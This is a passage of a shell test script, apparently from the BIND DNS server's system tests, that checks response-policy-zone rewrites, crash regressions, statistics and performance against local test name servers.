-eq "$1" && return + else + get_sn "$2" "$3" + test "$SN" -eq "$1" && return + fi + n=`expr $n + 1` + if test "$n" -gt $TEN_SECS; then + echo_i "got serial number \"$SN\" instead of \"$1\" from $2 @$3" + return + fi + $WAIT_CMD + done +} + +# (re)load the response policy zones with the rules in the file $TEST_FILE +load_db () { + if test -n "$TEST_FILE"; then + copy_setports $TEST_FILE tmp + if $NSUPDATE -v tmp; then : + $RNDCCMD $ns3 sync + else + echo_i "failed to update policy zone with $TEST_FILE" + $RNDCCMD $ns3 sync + exit 1 + fi + rm -f tmp + fi +} + +# restart name server +# $1 ns number +# $2 rebuild bl rpz zones if "rebuild-bl-rpz" +restart () { + # try to ensure that the server really has stopped + # and won't mess with ns$1/name.pid + if test -z "$HAVE_CORE" -a -f ns$1/named.pid; then + $RNDCCMD $ns$1 halt >/dev/null 2>&1 + if test -f ns$1/named.pid; then + sleep 1 + PID=`cat ns$1/named.pid 2>/dev/null` + if test -n "$PID"; then + echo_i "killing ns$1 server $PID" + $KILL -9 $PID + fi + fi + fi + rm -f ns$1/*.jnl + if [ "$2" = "rebuild-bl-rpz" ]; then + if test -f ns$1/base.db; then + for NM in ns$1/bl*.db; do + cp -f ns$1/base.db $NM + done + fi + fi + start_server --noclean --restart --port ${PORT} ns$1 + load_db + dnsrps_loaded + sleep 1 +} + +# $1=server and irrelevant args +# $2=error message +ckalive () { + CKALIVE_NS=`expr "$1" : '.*@ns\([1-9]\).*'` + if test -z "$CKALIVE_NS"; then + CKALIVE_NS=3 + fi + eval CKALIVE_IP=\$ns$CKALIVE_NS + $RNDCCMD $CKALIVE_IP status >/dev/null 2>&1 && return 0 + HAVE_CORE=yes + setret "$2" + # restart the server to avoid stalling waiting for it to stop + restart $CKALIVE_NS "rebuild-bl-rpz" + return 1 +} + +resetstats () { + NSDIR=$1 + eval "${NSDIR}_CNT=''" +} + +ckstats () { + HOST=$1 + LABEL="$2" + NSDIR="$3" + EXPECTED="$4" + $RNDCCMD $HOST stats + NEW_CNT=0`sed -n -e 's/[ ]*\([0-9]*\).response policy.*/\1/p' \ + $NSDIR/named.stats | tail -1` + eval "OLD_CNT=0\$${NSDIR}_CNT" + GOT=`expr $NEW_CNT - $OLD_CNT` + if test "$GOT" -ne "$EXPECTED"; then + setret "wrong $LABEL $NSDIR statistics of $GOT instead of $EXPECTED" + fi + eval "${NSDIR}_CNT=$NEW_CNT" +} + +ckstatsrange () { + HOST=$1 + LABEL="$2" + NSDIR="$3" + MIN="$4" + MAX="$5" + $RNDCCMD $HOST stats + NEW_CNT=0`sed -n -e 's/[ ]*\([0-9]*\).response policy.*/\1/p' \ + $NSDIR/named.stats | tail -1` + eval "OLD_CNT=0\$${NSDIR}_CNT" + GOT=`expr $NEW_CNT - $OLD_CNT` + if test "$GOT" -lt "$MIN" -o "$GOT" -gt "$MAX"; then + setret "wrong $LABEL $NSDIR statistics of $GOT instead of ${MIN}..${MAX}" + fi + eval "${NSDIR}_CNT=$NEW_CNT" +} + +# $1=message +# $2=optional test file name +start_group () { + ret=0 + t=`expr $t + 1` + test -n "$1" && date "+${TS}checking $1 (${t})" | cat_i + TEST_FILE=$2 + if test -n "$TEST_FILE"; then + GROUP_NM="-$TEST_FILE" + load_db + else + GROUP_NM= + fi + dnsrps_loaded + TEST_NUM=0 +} + +end_group () { + if test -n "$TEST_FILE"; then + # remove the previous set of test rules + copy_setports $TEST_FILE tmp + sed -e 's/[ ]add[ ]/ delete /' tmp | $NSUPDATE + rm -f tmp + TEST_FILE= + fi + ckalive $ns3 "failed; ns3 server crashed and restarted" + dnsrps_loaded + GROUP_NM= +} + +clean_result () { + if test -z "$SAVE_RESULTS"; then + rm -f $* + fi +} + +# $1=dig args +# $2=other dig output file +ckresult () { + #ckalive "$1" "server crashed by 'dig $1'" || return 1 + expr "$1" : 'TCP ' > /dev/null && tcp=1 || tcp=0 + digarg=${1#TCP } + + if grep "flags:.* aa .*ad;" $DIGNM; then + setret "'dig $digarg' AA and AD set;" + elif grep "flags:.* aa .*ad;" $DIGNM; then + setret "'dig $digarg' AD set;" + fi + + if $PERL $SYSTEMTESTTOP/digcomp.pl $DIGNM $2 >/dev/null; then + grep -q 'Truncated, retrying in TCP' $DIGNM && trunc=1 || trunc=0 + if [ "$tcp" -ne "$trunc" ]; then + setret "'dig $digarg' wrong; no or unexpected truncation in $DIGNM" + return 1 + fi + clean_result ${DIGNM}* + return 0 + fi + setret "'dig $digarg' wrong; diff $DIGNM $2" + return 1 +} + +# check only that the server does not crash +# $1=target domain +# $2=optional query type +nocrash () { + digcmd $* >/dev/null + ckalive "$*" "server crashed by 'dig $*'" +} + + +# check rewrite to NXDOMAIN +# $1=target domain +# $2=optional query type +nxdomain () { + make_dignm + digcmd $* \ + | sed -e 's/^[a-z].* IN CNAME /;xxx &/' \ + -e 's/^[a-z].* IN RRSIG /;xxx &/' \ + >$DIGNM + ckresult "$*" proto.nxdomain +} + +# check rewrite to NODATA +# $1=target domain +# $2=optional query type +nodata () { + make_dignm + digcmd $* \ + | sed -e 's/^[a-z].* IN CNAME /;xxx &/' >$DIGNM + ckresult "$*" proto.nodata +} + +# check rewrite to an address +# modify the output so that it is easily compared, but save the original line +# $1=IPv4 address +# $2=digcmd args +# $3=optional TTL +addr () { + ADDR=$1 + make_dignm + digcmd $2 >$DIGNM + #ckalive "$2" "server crashed by 'dig $2'" || return 1 + ADDR_ESC=`echo "$ADDR" | sed -e 's/\./\\\\./g'` + ADDR_TTL=`tr -d '\r' < $DIGNM | sed -n -e "s/^[-.a-z0-9]\{1,\}[ ]*\([0-9]*\) IN AA* ${ADDR_ESC}\$/\1/p"` + if test -z "$ADDR_TTL"; then + setret "'dig $2' wrong; no address $ADDR record in $DIGNM" + return 1 + fi + if test -n "$3" && test "$ADDR_TTL" -ne "$3"; then + setret "'dig $2' wrong; TTL=$ADDR_TTL instead of $3 in $DIGNM" + return 1 + fi + clean_result ${DIGNM}* +} + +# Check that a response is not rewritten +# Use $ns1 instead of the authority for most test domains, $ns2 to prevent +# spurious differences for `dig +norecurse` +# $1=optional "TCP" +# remaining args for dig +nochange () { + make_dignm + digcmd $* >$DIGNM + digcmd $* @$ns1 >${DIGNM}_OK + ckresult "$*" ${DIGNM}_OK && clean_result ${DIGNM}_OK +} + +nochange_ns10 () { + make_dignm + digcmd $* >$DIGNM + digcmd $* @$ns10 >${DIGNM}_OK + ckresult "$*" ${DIGNM}_OK && clean_result ${DIGNM}_OK +} + +# check against a 'here document' +here () { + make_dignm + sed -e 's/^[ ]*//' >${DIGNM}_OK + digcmd $* >$DIGNM + ckresult "$*" ${DIGNM}_OK +} + +# check dropped response +DROPPED='^;; connection timed out; no servers could be reached' +drop () { + make_dignm + digcmd $* >$DIGNM + if grep "$DROPPED" $DIGNM >/dev/null; then + clean_result ${DIGNM}* + return 0 + fi + setret "'dig $1' wrong; response in $DIGNM" + return 1 +} + +nsd() { + $NSUPDATE -p ${PORT} << EOF + server $1 + ttl 300 + update $2 $3 IN CNAME . + update $2 $4 IN CNAME . + send +EOF + sleep 2 +} + +# +# generate prototype NXDOMAIN response to compare against. +# +make_proto_nxdomain() { + digcmd nonexistent @$ns2 >proto.nxdomain || return 1 + grep "status: NXDOMAIN" proto.nxdomain >/dev/null || return 1 + return 0 +} + +# +# generate prototype NODATA response to compare against. +# +make_proto_nodata() { + digcmd txt-only.tld2 @$ns2 >proto.nodata || return 1 + grep "status: NOERROR" proto.nodata >/dev/null || return 1 + return 0 +} + +for mode in native dnsrps; do + status=0 + case ${mode} in + native) + if [ -e dnsrps-only ] ; then + echo_i "'dnsrps-only' found: skipping native RPZ sub-test" + continue + else + echo_i "running native RPZ sub-test" + fi + ;; + dnsrps) + if [ -e dnsrps-off ] ; then + echo_i "'dnsrps-off' found: skipping DNSRPS sub-test" + continue + fi + echo_i "attempting to configure servers with DNSRPS..." + stop_server --use-rndc --port ${CONTROLPORT} + $SHELL ./setup.sh -N -D $DEBUG + for server in ns*; do + resetstats $server + done + sed -n 's/^## //p' dnsrps.conf | cat_i + if grep '^#fail' dnsrps.conf >/dev/null; then + echo_i "exit status: 1" + exit 1 + fi + if grep '^#skip' dnsrps.conf > /dev/null; then + echo_i "DNSRPS sub-test skipped" + continue + else + echo_i "running DNSRPS sub-test" + start_server --noclean --restart --port ${PORT} + sleep 3 + fi + ;; + esac + + # make prototype files to check against rewritten results + retry_quiet 10 make_proto_nxdomain + retry_quiet 10 make_proto_nodata + + start_group "QNAME rewrites" test1 + nochange . # 1 do not crash or rewrite root + nxdomain a0-1.tld2 # 2 + nodata a3-1.tld2 # 3 + nodata a3-2.tld2 # 4 nodata at DNAME itself + nochange sub.a3-2.tld2 # 5 miss where DNAME might work + nxdomain a4-2.tld2 # 6 rewrite based on CNAME target + nxdomain a4-2-cname.tld2 # 7 + nodata a4-3-cname.tld2 # 8 + addr 12.12.12.12 a4-1.sub1.tld2 # 9 A replacement + addr 12.12.12.12 a4-1.sub2.tld2 # 10 A replacement with wildcard + addr 12.12.12.12 nxc1.sub1.tld2 # 11 replace NXDOMAIN with CNAME + addr 12.12.12.12 nxc2.sub1.tld2 # 12 replace NXDOMAIN with CNAME chain + addr 127.4.4.1 a4-4.tld2 # 13 prefer 1st conflicting QNAME zone + nochange a6-1.tld2 # 14 + addr 127.6.2.1 a6-2.tld2 # 15 + addr 56.56.56.56 a3-6.tld2 # 16 wildcard CNAME + addr 57.57.57.57 a3-7.sub1.tld2 # 17 wildcard CNAME + addr 127.0.0.16 a4-5-cname3.tld2 # 18 CNAME chain + addr 127.0.0.17 a4-6-cname3.tld2 # 19 stop short in CNAME chain + nochange a5-2.tld2 +norecurse # 20 check that RD=1 is required + nochange a5-3.tld2 +norecurse # 21 + nochange a5-4.tld2 +norecurse # 22 + nochange sub.a5-4.tld2 +norecurse # 23 + nxdomain c1.crash2.tld3 # 24 assert in rbtdb.c + nxdomain a0-1.tld2 +dnssec # 25 simple DO=1 without signatures + nxdomain a0-1.tld2s +nodnssec # 26 simple DO=0 with signatures + nochange a0-1.tld2s +dnssec # 27 simple DO=1 with signatures + nxdomain a0-1s-cname.tld2s +dnssec # 28 DNSSEC too early in CNAME chain + nochange a0-1-scname.tld2 +dnssec # 29 DNSSEC on target in CNAME chain + nochange a0-1.tld2s srv +auth +dnssec # 30 no write for DNSSEC and no record + nxdomain a0-1.tld2s srv +nodnssec # 31 + drop a3-8.tld2 any # 32 drop + nochange TCP a3-9.tld2 # 33 tcp-only + here x.servfail <<'EOF' # 34 qname-wait-recurse yes + ;; status: SERVFAIL, x +EOF + addr 35.35.35.35 "x.servfail @$ns5" # 35 qname-wait-recurse no + end_group + ckstats $ns3 test1 ns3 22 + ckstats $ns5 test1 ns5 1 + ckstats $ns6 test1 ns6 0 + + start_group "NXDOMAIN/NODATA action on QNAME trigger" test1 + nxdomain a0-1.tld2 @$ns6 # 1 + nodata a3-1.tld2 @$ns6 # 2 + nodata a3-2.tld2 @$ns6 # 3 nodata at DNAME itself + nxdomain a4-2.tld2 @$ns6 # 4 rewrite based on CNAME target + nxdomain a4-2-cname.tld2 @$ns6 # 5 + nodata a4-3-cname.tld2 @$ns6 # 6 + addr 12.12.12.12 "a4-1.sub1.tld2 @$ns6" # 7 A replacement + addr 12.12.12.12 "a4-1.sub2.tld2 @$ns6" # 8 A replacement with wildcard + addr 127.4.4.1 "a4-4.tld2 @$ns6" # 9 prefer 1st conflicting QNAME zone + addr 12.12.12.12 "nxc1.sub1.tld2 @$ns6" # 10 replace NXDOMAIN w/ CNAME + addr 12.12.12.12 "nxc2.sub1.tld2 @$ns6" # 11 replace NXDOMAIN w/ CNAME chain + addr 127.6.2.1 "a6-2.tld2 @$ns6" # 12 + addr 56.56.56.56 "a3-6.tld2 @$ns6" # 13 wildcard CNAME + addr 57.57.57.57 "a3-7.sub1.tld2 @$ns6" # 14 wildcard CNAME + addr 127.0.0.16 "a4-5-cname3.tld2 @$ns6" # 15 CNAME chain + addr 127.0.0.17 "a4-6-cname3.tld2 @$ns6" # 16 stop short in CNAME chain + nxdomain c1.crash2.tld3 @$ns6 # 17 assert in rbtdb.c + nxdomain a0-1.tld2 +dnssec @$ns6 # 18 simple DO=1 without sigs + nxdomain a0-1s-cname.tld2s +dnssec @$ns6 # 19 + drop a3-8.tld2 any @$ns6 # 20 drop + end_group + ckstatsrange $ns3 test1 ns3 22 30 + ckstats $ns5 test1 ns5 0 + ckstats $ns6 test1 ns6 0 + + start_group "IP rewrites" test2 + nodata a3-1.tld2 # 1 NODATA + nochange a3-2.tld2 # 2 no policy record so no change + nochange a4-1.tld2 # 3 obsolete PASSTHRU record style + nxdomain a4-2.tld2 # 4 + nochange a4-2.tld2 -taaaa # 5 no A => no policy rewrite + nochange a4-2.tld2 -ttxt # 6 no A => no policy rewrite + nxdomain a4-2.tld2 -tany # 7 no A => no policy rewrite + nodata a4-3.tld2 # 8 + nxdomain a3-1.tld2 -taaaa # 9 IPv6 policy + nochange a4-1-aaaa.tld2 -taaaa # 10 + addr 127.0.0.1 a5-1-2.tld2 # 11 prefer smallest policy address + addr 127.0.0.1 a5-3.tld2 # 12 prefer first conflicting IP zone + nochange a5-4.tld2 +norecurse # 13 check that RD=1 is required for #14 + addr 14.14.14.14 a5-4.tld2 # 14 prefer QNAME to IP + nochange a4-4.tld2 # 15 PASSTHRU + nxdomain c2.crash2.tld3 # 16 assert in rbtdb.c + addr 127.0.0.17 "a4-4.tld2 -b $ns1" # 17 client-IP address trigger + nxdomain a7-1.tld2 # 18 secondary policy zone (RT34450) + # updating an response zone policy + cp ns2/blv2.tld2.db.in ns2/bl.tld2.db + rndc_reload ns2 $ns2 bl.tld2 + ck_soa 2 bl.tld2 $ns3 + nochange a7-1.tld2 # 19 PASSTHRU + # ensure that a clock tick has occurred so that named will do the reload + sleep 1 + cp ns2/blv3.tld2.db.in ns2/bl.tld2.db + rndc_reload ns2 $ns2 bl.tld2 + ck_soa 3 bl.tld2 $ns3 + nxdomain a7-1.tld2 # 20 secondary policy zone (RT34450) + end_group + ckstats $ns3 test2 ns3 12 + + # check that IP addresses for previous group were deleted from the radix tree + start_group "radix tree deletions" + nochange a3-1.tld2 + nochange a3-2.tld2 + nochange a4-1.tld2 + nochange a4-2.tld2 + nochange a4-2.tld2 -taaaa + nochange a4-2.tld2 -ttxt + nochange a4-2.tld2 -tany + nochange a4-3.tld2 + nochange a3-1.tld2 -tAAAA + nochange a4-1-aaaa.tld2 -tAAAA + nochange a5-1-2.tld2 + end_group + ckstats $ns3 'radix tree deletions' ns3 0 + + # these tests assume "min-ns-dots 0" + start_group "NSDNAME rewrites" test3 + nextpart ns3/named.run > /dev/null + nochange a3-1.tld2 # 1 + nochange a3-1.tld2 +dnssec # 2 this once caused problems + nxdomain a3-1.sub1.tld2 # 3 NXDOMAIN *.sub1.tld2 by NSDNAME + nxdomain a3-1.subsub.sub1.tld2 # 4 + nxdomain a3-1.subsub.sub1.tld2 -tany # 5 + addr 12.12.12.12 a4-2.subsub.sub2.tld2 # 6 walled garden for *.sub2.tld2 + nochange a3-2.tld2. # 7 exempt rewrite by name + nochange a0-1.tld2. # 8 exempt rewrite by address block + addr 12.12.12.12 a4-1.tld2 # 9 prefer QNAME policy to NSDNAME + addr 127.0.0.1 a3-1.sub3.tld2 # 10 prefer policy for largest NSDNAME + addr 127.0.0.2 a3-1.subsub.sub3.tld2 # 11 + nxdomain xxx.crash1.tld2 # 12 dns_db_detachnode() crash + + nxdomain a3-1.stub # 13 + nxdomain a3-1.static-stub # 14 + nochange_ns10 a3-1.stub-nomatch # 15 + nochange_ns10 a3-1.static-stub-nomatch # 16 + if [ "$mode" = dnsrps ]; then + addr 12.12.12.12 as-ns.tld5. # 17 qname-as-ns + fi + nextpart ns3/named.run | grep -q "unrecognized NS rpz_rrset_find() failed: glue" && + setret "seen: unrecognized NS rpz_rrset_find() failed: glue" + end_group + if [ "$mode" = dnsrps ]; then + ckstats $ns3 test3 ns3 10 + else + ckstats $ns3 test3 ns3 9 + fi + + # these tests assume "min-ns-dots 0" + start_group "NSIP rewrites" test4 + nextpart ns3/named.run > /dev/null + nxdomain a3-1.tld2 # 1 NXDOMAIN for all of tld2 + nochange a3-2.tld2. # 2 exempt rewrite by name + nochange a0-1.tld2. # 3 exempt rewrite by address block + nochange a3-1.tld4 # 4 different NS IP address + nxdomain a4-1.stub # 5 + nxdomain a4-1.static-stub # 6 + nochange_ns10 a4-1.stub-nomatch # 7 + nochange_ns10 a4-1.static-stub-nomatch # 8 + if [ "$mode" = dnsrps ]; then + addr 12.12.12.12 as-ns.tld5. # 9 ip-as-ns + fi + nextpart ns3/named.run | grep -q "unrecognized NS rpz_rrset_find() failed: glue" && + setret "seen: unrecognized NS rpz_rrset_find() failed: glue" + end_group + + start_group "walled garden NSIP rewrites" test4a + addr 41.41.41.41 a3-1.tld2 # 1 walled garden for all of tld2 + addr 2041::41 'a3-1.tld2 AAAA' # 2 walled garden for all of tld2 + here a3-1.tld2 TXT <<'EOF' # 3 text message for all of tld2 + ;; status: NOERROR, x + a3-1.tld2. x IN TXT "NSIP walled garden" +EOF + end_group + if [ "$mode" = dnsrps ]; then + ckstats $ns3 test4 ns3 7 + else + ckstats $ns3 test4 ns3 6 + fi + + # policies in ./test5 overridden by response-policy{} in ns3/named.conf + # and in ns5/named.conf + start_group "policy overrides" test5 + addr 127.0.0.1 a3-1.tld2 # 1 bl-given + nochange a3-2.tld2 # 2 bl-passthru + nochange a3-3.tld2 # 3 bl-no-op (obsolete for passthru) + nochange a3-4.tld2 # 4 bl-disabled + nodata a3-5.tld2 # 5 bl-nodata zone recursive-only no + nodata a3-5.tld2 +norecurse # 6 bl-nodata zone recursive-only no + nodata a3-5.tld2 # 7 bl-nodata not needed + nxdomain a3-5.tld2 +norecurse @$ns5 # 8 bl-nodata global recursive-only no + nxdomain a3-5.tld2s @$ns5 # 9 bl-nodata global break-dnssec + nxdomain a3-5.tld2s +dnssec @$ns5 # 10 bl-nodata global break-dnssec + nxdomain a3-6.tld2 # 11 bl-nxdomain + here a3-7.tld2 -tany <<'EOF' # 12 + ;; status: NOERROR, x + a3-7.tld2. x IN CNAME txt-only.tld2. + txt-only.tld2. x IN TXT "txt-only-tld2" +EOF + addr 58.58.58.58 a3-8.tld2 # 13 bl_wildcname + addr 59.59.59.59 a3-9.sub9.tld2 # 14 bl_wildcname + addr 12.12.12.12 a3-15.tld2 # 15 bl-garden via CNAME to a12.tld2 + addr 127.0.0.16 a3-16.tld2 100 # 16 bl max-policy-ttl 100 + addr 17.17.17.17 "a3-17.tld2 @$ns5" 90 # 17 ns5 bl max-policy-ttl 90 + drop a3-18.tld2 any # 18 bl-drop + nxdomain TCP a3-19.tld2 # 19 bl-tcp-only + end_group + ckstats $ns3 test5 ns3 12 + ckstats $ns5 test5 ns5 4 + + # check that miscellaneous bugs are still absent + start_group "crashes" test6 + for Q in RRSIG SIG ANY 'ANY +dnssec'; do + nocrash a3-1.tld2 -t$Q + nocrash a3-2.tld2 -t$Q + nocrash a3-5.tld2 -t$Q + nocrash www.redirect -t$Q + nocrash www.credirect -t$Q + done + + # This is not a bug, because any data leaked by writing 24.4.3.2.10.rpz-ip + # (or whatever) is available by publishing "foo A 10.2.3.4" and then + # resolving foo. + # nxdomain 32.3.2.1.127.rpz-ip + end_group + ckstats $ns3 bugs ns3 8 + + # superficial test for major performance bugs + QPERF=`sh qperf.sh` + if test -n "$QPERF"; then + perf () { + date "+${TS}checking performance $1" | cat_i + # Dry run to prime everything + comment "before dry run $1" + $RNDCCMD $ns5 notrace + $QPERF -c -1 -l30 -d ns5/requests -s $ns5 -p ${PORT} >/dev/null + comment "before real test $1" + PFILE="ns5/$2.perf" + $QPERF -c -1 -l30 -d ns5/requests -s $ns5 -p ${PORT} >$PFILE + comment "after test $1" + X=`sed -n -e 's/.*Returned *\([^ ]*:\) *\([0-9]*\) .*/\1\2/p' $PFILE \ + | tr '\n' ' '` + if test "$X" != "$3"; then + setret "wrong results '$X' in $PFILE" + fi + ckalive $ns5 "failed; server #5 crashed" + } + trim () { + sed -n -e 's/.*Queries per second: *\([0-9]*\).*/\1/p' ns5/$1.perf + } + + # get qps with rpz + perf 'with RPZ' rpz 'NOERROR:2900 NXDOMAIN:100 ' + RPZ=`trim rpz` + # turn off rpz and measure qps again + echo "# RPZ off" >ns5/rpz-switch + RNDCCMD_OUT=`$RNDCCMD $ns5 reload` + perf 'without RPZ' norpz 'NOERROR:3000 ' + NORPZ=`trim norpz` + + PERCENT=`expr \( "$RPZ" \* 100 + \( $NORPZ / 2 \) \) / $NORPZ` + echo_i "$RPZ qps with RPZ is $PERCENT% of $NORPZ qps without RPZ" + + MIN_PERCENT=30 + if test "$PERCENT" -lt $MIN_PERCENT; then + echo_i "$RPZ qps with rpz or $PERCENT% is below $MIN_PERCENT% of $NORPZ qps" + fi + + if test "$PERCENT" -ge 100; then + echo_i "$RPZ qps with RPZ or $PERCENT% of $NORPZ qps without RPZ is too high" + fi + + ckstats $ns5 performance ns5 200 + + else + echo_i "performance not checked; queryperf not available" + fi + + if [ "$mode" = dnsrps ]; then + echo_i "checking that dnsrpzd is automatically restarted" + OLD_PID=`cat dnsrpzd.pid` + $KILL "$OLD_PID" + n=0 + while true; do + NEW_PID=`cat dnsrpzd.pid 2>/dev/null` + if test -n "$NEW_PID" -a "0$OLD_PID" -ne "0$NEW_PID"; then + #echo "OLD_PID=$OLD_PID NEW_PID=$NEW_PID" + break; + fi + $DIG -p ${PORT} +short +norecurse a0-1.tld2 @$ns3 >/dev/null + n=`expr $n + 1` + if test "$n" -gt $TEN_SECS; then + setret "dnsrpzd did not restart" + break + fi + $WAIT_CMD + done + fi + + # Ensure ns3 manages to transfer the fast-expire zone before shutdown. + nextpartreset ns3/named.run + wait_for_log 20 "zone fast-expire/IN: transferred serial 1" ns3/named.run + + # reconfigure the ns5 primary server without the fast-expire zone, so + # it can't be refreshed on ns3, and will expire in 5 seconds. + cat /dev/null > ns5/expire.conf + rndc_reconfig ns5 10.53.0.5 + + # restart the main test RPZ server to see if that creates a core file + if test -z "$HAVE_CORE"; then + stop_server --use-rndc --port ${CONTROLPORT} ns3 + restart 3 "rebuild-bl-rpz" + HAVE_CORE=`find ns* -name '*core*' -print` + test -z "$HAVE_CORE" || setret "found $HAVE_CORE; memory leak?" + fi + + # look for complaints from lib/dns/rpz.c and bin/name/query.c + for runfile in ns*/named.run; do + EMSGS=`nextpart $runfile | grep -E -l 'invalid rpz|rpz.*failed'` + if test -n "$EMSGS"; then + setret "error messages in $runfile starting with:" + grep -E 'invalid rpz|rpz.*failed' ns*/named.run | \ + sed -e '10,$d' -e 's/^//' | cat_i + fi + done + + if [ native = "$mode" ]; then + # restart the main test RPZ server with a bad zone. + t=`expr $t + 1` + echo_i "checking that ns3 with broken rpz does not crash (${t})" + stop_server --use-rndc --port ${CONTROLPORT} ns3 + cp ns3/broken.db.in ns3/bl.db + restart 3 # do not rebuild rpz zones + nocrash a3-1.tld2 -tA + stop_server --use-rndc --port ${CONTROLPORT} ns3 + restart 3 "rebuild-bl-rpz" + + t=`expr $t + 1` + echo_i "checking if rpz survives a certain class of failed reconfiguration attempts (${t})" + sed -e "s/^#BAD//" < ns3/named.conf.in > ns3/named.conf.tmp + copy_setports ns3/named.conf.tmp ns3/named.conf + rm ns3/named.conf.tmp + $RNDCCMD $ns3 reconfig > /dev/null 2>&1 && setret "failed" + sleep 1 + copy_setports ns3/named.conf.in ns3/named.conf + $RNDCCMD $ns3 reconfig || setret "failed" + + # reload a RPZ zone that is now deliberately broken. + t=`expr $t + 1` + echo_i "checking rpz failed update will keep previous rpz rules (${t})" + $DIG -p ${PORT} @$ns3 walled.tld2 > dig.out.$t.before + grep "walled\.tld2\..*IN.*A.*10\.0\.0\.1" dig.out.$t.before > /dev/null || setret "failed" + cp ns3/broken.db.in ns3/manual-update-rpz.db + rndc_reload ns3 $ns3 manual-update-rpz + sleep 1 + # ensure previous RPZ rules still apply. + $DIG -p ${PORT} @$ns3 walled.tld2 > dig.out.$t.after + grep "walled\.tld2\..*IN.*A.*10\.0\.0\.1" dig.out.$t.after > /dev/null || setret "failed" + + t=`expr $t + 1` + echo_i "checking reload of a mixed-case RPZ zone (${t})" + # First, a sanity check: the A6-2.TLD2.mixed-case-rpz RPZ record should + # cause a6-2.tld2 NOERROR answers to be rewritten to NXDOMAIN answers. + $DIG -p ${PORT} @$ns3 a6-2.tld2. A > dig.out.$t.before + grep "status: NXDOMAIN" dig.out.$t.before >/dev/null || setret "failed" + # Add a sibling name (a6-1.tld2.mixed-case-rpz, with "tld2" in lowercase + # rather than uppercase) before A6-2.TLD.mixed-case-rpz. + nextpart ns3/named.run > /dev/null + cp ns3/mixed-case-rpz-2.db.in ns3/mixed-case-rpz.db + rndc_reload ns3 $ns3 mixed-case-rpz + wait_for_log 20 "rpz: mixed-case-rpz: reload done" ns3/named.run + # a6-2.tld2 NOERROR answers should still be rewritten to NXDOMAIN answers. + # (The bug we try to trigger here caused a6-2.tld2.mixed-case-rpz to be + # erroneously removed from the summary RPZ database after reload.) + $DIG -p ${PORT} @$ns3 a6-2.tld2. A > dig.out.$t.after + grep "status: NXDOMAIN" dig.out.$t.after >/dev/null || setret "failed" + fi + + t=`expr $t + 1` + echo_i "checking that ttl values are not zeroed when qtype is '*' (${t})" + $DIG +noall +answer -p ${PORT} @$ns3 any a3-2.tld2 > dig.out.$t + ttl=`awk '/a3-2 tld2 text/ {print $2}' dig.out.$t` + if test ${ttl:=0} -eq 0; then setret "failed"; fi + + t=`expr $t + 1` + echo_i "checking rpz updates/transfers with parent nodes added after children (${t})" + # regression test for RT #36272: the success condition + # is the secondary server not crashing. + for i in 1 2 3 4 5; do + nsd $ns5 add example.com.policy1. '*.example.com.policy1.' + nsd $ns5 delete example.com.policy1. '*.example.com.policy1.' + done + for i in 1 2 3 4 5; do + nsd $ns5 add '*.example.com.policy1.' example.com.policy1. + nsd $ns5 delete '*.example.com.policy1.' example.com.policy1. + done + + t=`expr $t + 1` + echo_i "checking that going from an empty policy zone works (${t})" + nsd $ns5 add '*.x.servfail.policy2.' x.servfail.policy2. + sleep 1 + rndc_reload ns7 $ns7 policy2 + $DIG z.x.servfail -p ${PORT} @$ns7 > dig.out.${t} + grep NXDOMAIN dig.out.${t} > /dev/null || setret "failed" + + t=`expr $t + 1` + echo_i "checking that "add-soa no" at rpz zone level works (${t})" + $DIG z.x.servfail -p ${PORT} @$ns7 > dig.out.${t} + grep SOA dig.out.${t} > /dev/null && setret "failed" + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking that "add-soa yes" at response-policy level works (${t})" + $DIG walled.tld2 -p ${PORT} +noall +add @$ns3 > dig.out.${t} + grep "^manual-update-rpz\..*SOA" dig.out.${t} > /dev/null || setret "failed" + fi + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "reconfiguring server with 'add-soa no' (${t})" + cp ns3/named.conf ns3/named.conf.tmp + sed -e "s/add-soa yes/add-soa no/g" < ns3/named.conf.tmp > ns3/named.conf + rndc_reconfig ns3 $ns3 + echo_i "checking that 'add-soa no' at response-policy level works (${t})" + $DIG walled.tld2 -p ${PORT} +noall +add @$ns3 > dig.out.${t} + grep "^manual-update-rpz\..*SOA" dig.out.${t} > /dev/null && setret "failed" + fi + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking that 'add-soa unset' works (${t})" + $DIG walled.tld2 -p ${PORT} +noall +add @$ns8 > dig.out.${t} + grep "^manual-update-rpz\..*SOA" dig.out.${t} > /dev/null || setret "failed" + fi + + # dnsrps does not allow NS RRs in policy zones, so this check + # with dnsrps results in no rewriting. + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking rpz with delegation fails correctly (${t})" + $DIG -p ${PORT} @$ns3 ns example.com > dig.out.$t + grep "status: SERVFAIL" dig.out.$t > /dev/null || setret "failed" + + t=`expr $t + 1` + echo_i "checking policies from expired zone are no longer in effect ($t)" + $DIG -p ${PORT} @$ns3 a expired > dig.out.$t + grep "expired.*10.0.0.10" dig.out.$t > /dev/null && setret "failed" + grep "fast-expire/IN: response-policy zone expired" ns3/named.run > /dev/null || setret "failed" + fi + + # RPZ 'CNAME *.' (NODATA) trumps DNS64. Test against various DNS64 scenarios. + for label in a-only no-a-no-aaaa a-plus-aaaa + do + for type in AAAA A + do + t=`expr $t + 1` + case $label in + a-only) + echo_i "checking rpz 'CNAME *.' (NODATA) with dns64, $type lookup with A-only (${t})" + ;; + no-a-no-aaaa) + echo_i "checking rpz 'CNAME *.' (NODATA) with dns64, $type lookup with no A or AAAA (${t})" + ;; + a-plus-aaaa) + echo_i "checking rpz 'CNAME *.' (NODATA) with dns64, $type lookup with A and AAAA (${t})" + ;; + esac + ret=0 + $DIG ${label}.example -p ${PORT} $type @10.53.0.9 > dig.out.${t} + grep "status: NOERROR" dig.out.$t > /dev/null || ret=1 + grep "ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2$" dig.out.$t > /dev/null || ret=1 + grep "^rpz" dig.out.$t > /dev/null || ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` + done + done + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking that rewriting CD=1 queries handles pending data correctly (${t})" + $RNDCCMD $ns3 flush + $RNDCCMD $ns6 flush + $DIG a7-2.tld2s -p ${PORT} @$ns6 +cd > dig.out.${t} + grep -w "1.1.1.1" dig.out.${t} > /dev/null || setret "failed" + fi + + [ $status -ne 0 ] && pf=fail || pf=pass + case $mode in + native) + native=$status + echo_i "status (native RPZ sub-test): $status ($pf)";; + + dnsrps) + dnsrps=$status + echo_i 